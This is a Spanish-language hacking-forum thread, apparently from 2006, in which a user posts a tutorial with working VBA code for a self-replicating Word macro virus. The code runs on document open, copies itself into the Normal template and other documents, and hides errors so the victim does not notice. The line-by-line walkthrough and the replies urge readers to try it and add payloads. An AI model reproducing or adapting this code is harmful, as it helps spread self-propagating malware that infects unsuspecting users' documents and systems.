Bueno a continuacion se explicara como crear un virus (macro) en cualquier programa de la familia Office. (De micro$oft)
Primero que nada entramos al programa (en este tuto se utilizara Word) una ves adentro del programa nos dirijimos a el menu:
Herramientas --> Macro --> Editor de Visual Basic
(Como figura en la imagen)
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fxs308.xs.to%2Fxs308%2F06450%2FMenu.jpg&hash=0156d8a3ba8211a9cb095b8abfcf85e5f158305c)
Una ves adentro seguramente estaran acostumbrados al entorno VB.
Ahora fijen su vista en la seccion izquierda de la pantalla...
Se observaran 2 proyectos:
Normal
Project (Documento1)
A continuacion se explicara la funcion principal de cada uno de ellos:
Normal
Contiene toda la informacion que se carga cuando Word se inicia... Osea... nuestro objetivo es que el codigo se copie a si mismo (Virus) en el normal... para que de esta manera infecte tambien a los documentos proximos a abrirse.
Project (Documento1)
Contiene toda la infomacion que se carga cuando se abre el archivo que nosotros creamos. Aqui iria nuestro codigo original...
Buenisimo... hasta aca todo re bien.. pero ¿ahora que KaZiN?
Infeccion por Class Object o ThisDocument
Pues sencillo... abrimos el Project (Documento1) y abrimos el codigo de ThisDocument y luego programamos lo que se nos cante.
Los eventos son:
Sub AutoOpen() :
Cuando se abre un documento.
Funciona en Modulos
Sub AutoClose() :
Cuando se cierra un documento.
Funciona en Modulos
Sub Document_Open() :
Cuando se abre un documento.
Funciona en Class Object
Sub Document_Close() :
Cuando se cierra un documento.
Funciona en Class Object
Sub ViewVBCode() :
Cuando se carga el editor de Visual Basic.
Sub ToolsMacro() :
Cuando se carga la lista de macros.
Entonces, logico es que se utilizan AutoOpen(), AutoClose(), Document_Open() o Document_Close() para colocar el codigo, entonces, al cargarse un documento infectado este revisa si la plantilla normal esta infectada, si lo esta, entonces continua. Si no lo esta, copia su codigo a esta, entonces queda el virus residente en la plantilla normal, por lo cual cada vez que se de uno de los eventos anteriormente mencionados esta copiara su codigo a todos los documentos que se abran :O ( Bien ahi ;) )
Pero hoy solo trabajaremos con Document_Open() y Document_Close() ya que este tuto se limita a Class Object :P.
Bueno a continuacion haremos los siguiente:
Abrimos la planilla de nuestro documento... y le ponemos un codigo como este por ej :D:
'KaZiN
Private Sub Document_Open()
On Error Resume Next
Set Slow = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set Emotion = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Rulz = VBE.ActiveVBProject.VBComponents(1).CodeModule
Codigo = Rulz.Lines(1, Rulz.CountOfLines)
If (Slow.Lines(1, 1) <> "'KaZiN") Then
Slow.AddFromString Codigo
End If
If (Emotion.Lines(1, 1) <> "'KaZiN") Then
Emotion.AddFromString Codigo
End If
End Sub
bue... vamos a explicar que carajo fue lo que puse por si alguien no lo entendio :P.
'KaZiN
La primer linea del codigo tiene que tener lo que ustedes tengan ganas, esta sera la forma de saber si la pc ya esta infectada por nuestro virus o no. Entenderan mas adelante
On Error Resume Next
Simplemente para que en caso de que halla un error no se de cuenta nuestra victima
Set Slow = ActiveDocument.VBProject.VBComponents(1).CodeModule
Colocamos a Slow igual al codigo del class object del documento activo.
Set Emotion = NormalTemplate.VBProject.VBComponents(1).CodeModule
Colocamos a Emotion igual al codigo del class object del Normal
Set Rulz = VBE.ActiveVBProject.VBComponents(1).CodeModule
Colocamos a Rulz igual al codigo del class object del proyecto activo.
Codigo = Rulez.Lines(1, Rulez.CountOfLines)
Colocamos Codigo como el codigo del proyecto activo (Osea nuestro code)
If (Slow.Lines(1, 1) <> "'KaZiN") Then
Slow.AddFromString Codigo
End If
If (Emotion.Lines(1, 1) <> "'KaZiN") Then
Emotion.AddFromString Codigo
End If
Nos fijamos si la primera linea del documento activo es igual a nuestra marca de infeccion, si no lo es importamos desde la variable "Codigo" anteriormente declarada. Luego hace lo mismo con la plantilla Normal.
Ok ok ahi tienen explicado el codigo... bueno ahora simplemente prueben y disfruten creando ;).
Autor: ¹SlowEmotion² (El Tio KaZiN) Kraft Hacks Admin - Hack PR Staff
Salu2 a Deyabu, Anthrax, SnO.opy, Th6, Komtec1, Uleila.com. xD-Harry
Espero que les halla gustado y despues veo si puedo agregar algo mas :)
bueno amego fijate q yo te ayude eh!
tya muy bueno el tuto pero fijate cundo lo terminas xD
falta....
jajajja lo leiste para ver si tenia faltas de ortografia nomas feo ^^
no se si esto balla aka no creen ke puede ir en programacion ??? no lo muevo mejor si kieres muevelo tu si crees ke deve de ir aya o aka ok ;)
No creo que valla en programacion ya que se explica una tecnica... solo se expone un codigo de fuente como ej... ese empujoncioto que todos necesitamos alguna ves :).
Yo considero que deberia ir en la seccion Alerta de Virus... pero primero deberian cambiarle el nombre de la seccion.. ya que esto no es ninguna alerta..
Mandare un mensaje personal a los adminitradores solicitando la posibilidad de cambiarle el nombre a la seccion :)
Es interesante lo que me gusta es que explicas todo
deverias de abrir un tema en programacion y poner codigos de sus virus benignos claro para los que les interesa este tema no crees
Quote from: ::: Lot3k ::: on November 15, 2006, 06:04:59 PM
Es interesante lo que me gusta es que explicas todo
Explico todo porque cuando yo leia para aprender solo entendia la mitad... la otra mitad lo hacia de memoria... y eso no es aprender realmente. Me alegro que te halla gustado :P
oye esta muy bueno, pero kede dudoso en la parte donde se le puede poner el nombre el nombre ke uno kiera...kopio el kodigo y lo guardo....y luego ke pasa??? ???
mas ke obio ::)
la verdad que esta muy bueno, lo voy a hacer ya que hoy tengo algo de tiempo ;D
edited.
listo, pero ahora me dan mas ganas de meterme en todo lo de vb :D
Quote from: skamilo on November 16, 2006, 11:14:55 AM
oye esta muy bueno, pero kede dudoso en la parte donde se le puede poner el nombre el nombre ke uno kiera...kopio el kodigo y lo guardo....y luego ke pasa??? ???
Esa parte del codigo sirve para identificar si la pc esta infectada o no... ahi tenes que poner tu "Firma" por asi decirlo.
Por ej tu pones: 'skamilo
Entonces como tu dijiste lo guardas pero poniendo el codigo en el Sub Document_Open
entonces cada ves que se habra el documento se ejecuta el codigo...
de tal forma la pc se infecta...
¿No pasa nada? por supuesto que no! ese es el codigo de infeccion nada mas... despues ponele lo que tengas ganas
prueba poniendo un:
msgbox "Skamilo ama hack pr"
Si no entendiste agregame que te explico mejor:
[email protected]